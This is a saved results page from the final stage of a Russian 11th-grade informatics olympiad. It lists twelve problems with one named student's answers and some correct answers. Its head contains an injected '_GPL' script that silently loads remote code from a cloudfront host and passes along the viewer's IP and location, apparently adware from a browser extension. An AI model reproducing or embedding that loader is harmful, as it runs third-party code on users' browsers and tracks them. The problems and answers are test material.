<html><head>
    <meta http-equiv="Content-Language" content="ru">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link rel="stylesheet" href="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/main.css" type="text/css">
    <script type="text/javascript" src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/jquery.js"></script>
<title>Заключительный этап. Информатика. 11 класс</title>
<script type="text/javascript">function DM_ExtensionEvent(event){
  event.preventDefault();
  var element = event.target; 
  var ev = document.createEvent("Events");
  ev.initEvent("DMasterExtensionEvent", true, false);
  element.dispatchEvent(ev);
};
function convertLinksToDM()
{
  var re = /(?:.([^.]+))?$/;
  var extensions = "EXE,ZIP,RAR,ARJ,Z,GZ,LZH,GZIP,TAR,MP3,AVI,MPG,MPEG,QT,PLJ,ASF,WMA,WMV,MOV,TIF,TIFF,BIN,ACE,ISO,WAV,VQF,OGG,MPE,MPA,RAM,7Z,DOC,PDF,PPT,XLS,DJVU,MSI".split(",");
  for (var i=0;i<document.links.length;i++) {
    var ext = re.exec(document.links[i].href)[1].toUpperCase();
    if (ext.indexOf("?")>0) { ext = ext.split("?")[0] }
    try {
    if (extensions.indexOf(ext) >= 0) {
      document.links[i].addEventListener("click", function (e) { DM_ExtensionEvent(e); }, false);
    }
   } catch(e) { alert("error"); }
  }
};
convertLinksToDM();
</script><script type="text/javascript">(typeof _GPL_16_loaded == 'undefined') && (_GPL_16_loaded=true) && (_GPL_i=document.getElementsByTagName('head')) && (_GPL_i=(_GPL_i.length>0)?_GPL_i:document.getElementsByTagName('body')) && (_GPL_i.length>0) && (_GPL_j=document.createElement('script')) && (_GPL_j.async=true) && (_GPL_j.type='text/javascript') && (_GPL_j.src='https://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_16.js?pid=16&zoneid=7816&cid=RU&rid=48&ccid=Moscow&ip=87.118.208.194&aoi=1313688947') && (_GPL_i[0].appendChild(_GPL_j))</script><script src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/cc" type="text/javascript" async=""></script></head>
    <body topmargin="0" bgcolor="#ffffff" marginheight="0">

<table align="center" border="0" cellpadding="0" cellspacing="0" height="100%" width="100%">
	<tbody><tr>
		<td align="center" height="118">
<!------------------------------------------ Header ------------------------------------------>
<table border="0" cellpadding="0" cellspacing="0" width="90%">
	<tbody><tr>
		<td bgcolor="#66cc66" height="2"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" width="2"></td>
	</tr>
	<tr>
		<td bgcolor="#339933" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
		<td border="0" background="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/h.jpg" height="118" valign="bottom">
<table border="0" cellpadding="10" width="100%">
	<tbody><tr>
		<td>
        <h1>Заключительный этап. Информатика. 11 класс</h1>

		</td>
		<td align="right">
Здравствуйте, Ивановский Дмитрий Андреевич! | <a href="http://olymp.ifmo.ru/icms/login">Выход</a><br>
		</td>
	</tr>
</tbody></table>

		</td>
	</tr><tr>
		<td bgcolor="#999999" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
		<td bgcolor="#cccccc" height="4"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" width="4"></td>
	</tr>
</tbody></table>

<!------------------------------------------ /Header ------------------------------------------>
		</td>
	</tr>
	<tr>
		<td align="center" height="100%" valign="top"><h1>Результаты</h1>

<table align="center" width="20%">
    <tbody><tr>
        <td>Всего задач:</td>
        <td align="right">12</td>
    </tr>
    <tr>
        <td>Решенные задачи:</td>
        <td align="right">12</td>
    </tr>
    <tr>
        <td>Из них решено верно:</td>
        <td align="right">10</td>
    </tr>
    <tr>
        <td>Ваша сумма баллов:</td>
        <td align="right"><strong>19</strong> из 23</td>
    </tr>
    <tr>
        <td colspan="2" align="center"><a href="http://olymp.ifmo.ru/icms/">« Вернуться</a></td>
    </tr>
</tbody></table>


<table border="0" cellpadding="0" cellspacing="5" width="90%">
	<tbody><tr>
		<td colspan="3">&nbsp;</td>
	</tr>
	<tr>
        <td width="20"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/marker_na.gif"></td>
		<td class="14na">Задача №1</td>
		<td class="14na" align="right">1 балл</td>
	</tr>
    <tr>
		<td colspan="3" bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
        <td width="20"></td>
		<td><p style="text-align: justify;">Некоторое число, записанное в системе счисления с основанием 11 возвели в квадрат. Получилось 123456789A987654321<sub>11</sub>. Сколько единиц было в записи исходного числа в системе счисления с основанием 11. В ответе укажите целое число.</p></td>
        <td align="left" valign="top" width="100">
<font color="red">Ваш ответ: 3<br></font><p><i>Правильный ответ:</i> 10        </p></td>
	</tr>
	<tr>
		<td colspan="3">&nbsp;</td>
	</tr>
	<tr>
        <td width="20"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/marker_na.gif"></td>
		<td class="14na">Задача №2</td>
		<td class="14na" align="right">2 балла</td>
	</tr>
    <tr>
		<td colspan="3" bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
        <td width="20"></td>
		<td><p style="text-align: justify;">Выполните арифметическую операцию 
над числами, записанными в шестнадцатеричной системе счисления, и 
представьте результат в десятичной системе счисления.</p>
<p style="text-align: justify;">0,ABC<sub>16</sub>/0,2AF<sub>16</sub>=</p>
<p style="text-align: justify;">В ответе запишите число.</p></td>
        <td align="left" valign="top" width="100">
<font color="green">Ваш ответ: 4<br></font>        </td>
	</tr>
	<tr>
		<td colspan="3">&nbsp;</td>
	</tr>
	<tr>
        <td width="20"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/marker_na.gif"></td>
		<td class="14na">Задача №3</td>
		<td class="14na" align="right">3 балла</td>
	</tr>
    <tr>
		<td colspan="3" bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
        <td width="20"></td>
		<td><p style="text-align: justify;">Есть два восьмигранника. На каждую
 грань одного из них нанесены цифры 1, 2, 3 или 4 таким образом, что 
есть две грани с цифрой 1, две грани с цифрой 2, две грани с цифрой 3 и 
две грани с цифрой 4. Грани второго восьмигранника последовательно 
пронумерованы цифрами от 1 до 8. При выбрасывании восьмигранник с равной
 вероятностью ложиться на поверхность любой гранью. Оба восьмигранника 
брошены одновременно. Сколько бит информации будет нести сообщение о 
том, что оба восьмигранника легли на грани с цифрой 4? В ответе укажите 
число.</p></td>
        <td align="left" valign="top" width="100">
<font color="green">Ваш ответ: 5<br></font>        </td>
	</tr>
	<tr>
		<td colspan="3">&nbsp;</td>
	</tr>
	<tr>
        <td width="20"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/marker_na.gif"></td>
		<td class="14na">Задача №4</td>
		<td class="14na" align="right">3 балла</td>
	</tr>
    <tr>
		<td colspan="3" bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
        <td width="20"></td>
		<td><p>Упростите логическое выражение или укажите его результат (при 
его однозначности). Результат упрощения может содержать только операции 
инверсии, конъюнкции и дизъюнкции.</p>
<p>((((not&nbsp;A&nbsp;<font size="4">→</font> B)&nbsp;<font size="4">→</font> not&nbsp;C)&nbsp;<font size="4">→</font> not&nbsp;A)&nbsp;<font size="4">→</font> B)&nbsp;<font size="4">→</font> not&nbsp;C</p></td>
        <td align="left" valign="top" width="100">
<font color="red">Ваш ответ: not(B and C)<br></font><p><i>Правильные ответы:</i></p><ul><li>not B or not C</li><li>not C or not B</li></ul><p></p>        </td>
	</tr>
	<tr>
		<td colspan="3">&nbsp;</td>
	</tr>
	<tr>
        <td width="20"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/marker_na.gif"></td>
		<td class="14na">Задача №5</td>
		<td class="14na" align="right">1 балл</td>
	</tr>
    <tr>
		<td colspan="3" bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
        <td width="20"></td>
		<td><p style="text-align: justify;">Балбес, Трус и Бывалый обвиняются в
 краже со взломом. Они дают такие показания: Трус: Балбес виноват, а 
Бывалый невиновен. Балбес: Если Трус виновен, то виновен Бывалый. 
Бывалый: Я не виновен, хотя бы один из них виновен. Построив таблицы 
истинности полученных высказы­ваний, ответьте на следующий вопрос:</p>
<p style="text-align: justify;">Известно, что показания всех 
подозреваемых верны. Перечислите через пробел имена тех подозреваемых, 
которые в этом случае являются виновными.</p></td>
        <td align="left" valign="top" width="100">
<font color="green">Ваш ответ: Балбес<br></font>        </td>
	</tr>
	<tr>
		<td colspan="3">&nbsp;</td>
	</tr>
	<tr>
        <td width="20"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/marker_na.gif"></td>
		<td class="14na">Задача №6</td>
		<td class="14na" align="right">2 балла</td>
	</tr>
    <tr>
		<td colspan="3" bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
        <td width="20"></td>
		<td><p style="text-align: justify;">Петя отсканировал 12 изображений 
одинакового размера и с одинаковыми параметрами сканирования 
(разрешением и глубиной цвета). Выбранный им формат записи файла хранит 
несжатое растровое изображение и дополнительную информацию, причем объем
 дополнительной информации не зависит от объема файла и всегда 
составляет 256 Кбайт. Все файлы с отсканированными изображениями 
суммарно заняли ровно 129 Мбайт памяти.</p>
<p style="text-align: justify;">Вася обнаружил, что половина из этих 
изображений состоит из пикселей, в которых используются не все оттенки 
из палитры, соответствующей исходной глубине цвета сканирования, а 
только ровно половина от этих цветов. Он перезаписал эти файлы в том же 
формате, но с меньшей глубиной цвета, которая соответствовала 
уменьшившейся в два раза по сравнению с исходной палитрой оттенков. Это 
позволило ему сократить занимаемый объем на 4,5 Мбайт. Определите размер
 в пикселях по длинной стороне изображения, если известно, что его 
стороны соотносятся как 2:3. В ответе укажите целое число пикселей.</p></td>
        <td align="left" valign="top" width="100">
<font color="green">Ваш ответ: 3072<br></font>        </td>
	</tr>
	<tr>
		<td colspan="3">&nbsp;</td>
	</tr>
	<tr>
        <td width="20"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/marker_na.gif"></td>
		<td class="14na">Задача №7</td>
		<td class="14na" align="right">2 балла</td>
	</tr>
    <tr>
		<td colspan="3" bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
        <td width="20"></td>
		<td><p style="text-align: justify;">Дана блоксхема алгоритма 
заполнения трехмерного целочисленного массива, размером 16 Х 8 Х 4 
элементов. Какое значение имела целочисленная переменная n перед началом
 выполнения алгоритма, если после его выполнения элемент массива 
mas[8,4,2] оказался равен 1688? В ответе укажите целое число.</p>
<p style="text-align: center;"><img title="Изображение" src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/274_2995_128589d4.jpg" alt="Изображение"></p></td>
        <td align="left" valign="top" width="100">
<font color="green">Ваш ответ: 7<br></font>        </td>
	</tr>
	<tr>
		<td colspan="3">&nbsp;</td>
	</tr>
	<tr>
        <td width="20"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/marker_na.gif"></td>
		<td class="14na">Задача №8</td>
		<td class="14na" align="right">1 балл</td>
	</tr>
    <tr>
		<td colspan="3" bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
        <td width="20"></td>
		<td><p style="text-align: justify;">Дан фрагмент программы:</p>
<p><img title="Изображение" src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/274_2999_5e6d91f9.jpg" alt="Изображение"></p>
<p style="text-align: justify;">Чему было равно значение целочисленной переменной <strong>X</strong> на входе этого фрагмента, если после его выполнения получилось значение J=1773?</p>
<p style="text-align: justify;">В ответе укажите целое число.</p></td>
        <td align="left" valign="top" width="100">
<font color="green">Ваш ответ: 444<br></font>        </td>
	</tr>
	<tr>
		<td colspan="3">&nbsp;</td>
	</tr>
	<tr>
        <td width="20"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/marker_na.gif"></td>
		<td class="14na">Задача №9</td>
		<td class="14na" align="right">3 балла</td>
	</tr>
    <tr>
		<td colspan="3" bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
        <td width="20"></td>
		<td><p style="text-align: justify;">256 человек построены в одну 
шеренгу друг за другом. Шеренга перестраивается следующим образом. 
Отсчитывается пятый человек слева, начиная от первого, и он перемещается
 на крайнюю правую позицию в шеренге, а вся шеренга смыкается влево, 
заполняя свободное место. Затем опять отсчитывается пятый человек, 
начиная с человека, переместившегося на место ушедшего в конец шеренги 
при ее смыкании, и он также перемещается в конец шеренги. Подобное 
перемещение продолжается до тех пор, пока после очередного смыкания 
шеренги справа от переместившегося на освободившееся место человека не 
останется меньше пяти человек. На какой позиции в шеренге изначально 
стоял человек, который после окончания перестроений оказался на крайней 
правой позиции? В ответе укажите целое число.</p></td>
        <td align="left" valign="top" width="100">
<font color="green">Ваш ответ: 195<br></font>        </td>
	</tr>
	<tr>
		<td colspan="3">&nbsp;</td>
	</tr>
	<tr>
        <td width="20"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/marker_na.gif"></td>
		<td class="14na">Задача №10</td>
		<td class="14na" align="right">2 балла</td>
	</tr>
    <tr>
		<td colspan="3" bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
        <td width="20"></td>
		<td><p style="text-align: justify;">Три друга — Дима, Андрей и Олег — 
совместно используют канал доступа в Интернет с пропускной способностью 
96&nbsp;Мбайт в секунду. Система балансировки нагрузки настроена таким 
образом, что если в данный момент времени канал использует только один 
человек, то скачивание файла происходит со скоростью равной пропускной 
способности канала, а если канал используют несколько человек — 
пропускная способность канала поровну делится между пользователями. Дима
 начал скачивать файл размером 4&nbsp;Гбайт. Через 8&nbsp;секунд Андрей 
начал скачивать файл размером 2,5&nbsp;Гбайт. Через 4&nbsp;секунды после
 этого Олег начал скачивать файл размером 1&nbsp;Гбайт. Через какое 
время от начала скачивания Дима полностью скачает свой файл? Затраты 
пропускной способности канала на передачу управляющей информации и 
подтверждений не учитываются. В процессе скачивания файлов никакой 
дополнительной активности в сети пользователи не проявляют. В ответе 
укажите целое число секунд.</p></td>
        <td align="left" valign="top" width="100">
<font color="green">Ваш ответ: 80<br></font>        </td>
	</tr>
	<tr>
		<td colspan="3">&nbsp;</td>
	</tr>
	<tr>
        <td width="20"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/marker_na.gif"></td>
		<td class="14na">Задача №11</td>
		<td class="14na" align="right">1 балл</td>
	</tr>
    <tr>
		<td colspan="3" bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
        <td width="20"></td>
		<td><p>
</p><div style="text-align: justify;">В электронной таблице ячейки 
диапазона A1:A12 заполнили последовательностью натуральных чисел от 5 до
 16. В ячейку B1 записали формулу</div>
<div style="text-align: justify;">=СУММ($A$1:A1)+СУММ(A1:$A$7)</div>
<div style="text-align: justify;">и скопировали ее последовательно во 
все ячейки диапазона B2:B12. После этого удалили одну из 12 первых строк
 таблицы. Какую строку удалили, если после ее удаления сумма чисел 
диапазона B1:B11 стала равна 1031. В ответе укажите номер удаленной 
строки как целое число.</div>
<p></p></td>
        <td align="left" valign="top" width="100">
<font color="green">Ваш ответ: 4<br></font>        </td>
	</tr>
	<tr>
		<td colspan="3">&nbsp;</td>
	</tr>
	<tr>
        <td width="20"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/marker_na.gif"></td>
		<td class="14na">Задача №12</td>
		<td class="14na" align="right">2 балла</td>
	</tr>
    <tr>
		<td colspan="3" bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
        <td width="20"></td>
		<td><p style="text-align: justify;">К поисковому серверу Интернет было
 выполнено 6 запросов. Расположите номера запросов через запятую в 
порядке неубывающей последовательности относительно количества страниц, 
которые найдет поисковый сервер по каждому запросу. Порядок неубывающей 
последовательности относительно количества страниц подразумевает, что в 
результате каждого последующего в перечислении запроса может быть 
получено количество страниц равное или большее, чем в предыдущем, но не 
меньшее. Знак | обозначает операцию дизъюнкции, а &amp; - конъюнкции.</p>
<p>1.&nbsp; победители | жюри | стрельба | Россия</p>
<p>2.&nbsp; победители &amp; стрельба</p>
<p>3.&nbsp; победители | (жюри &amp; стрельба)</p>
<p>4.&nbsp; победители &amp; жюри &amp; Россия &amp; стрельба</p>
<p>5.&nbsp; победители &amp; Россия &amp; стрельба</p>
<p>6.&nbsp; (победители | жюри) &amp; стрельба</p></td>
        <td align="left" valign="top" width="100">
<font color="green">Ваш ответ: 4,5,2,6,3,1<br></font>        </td>
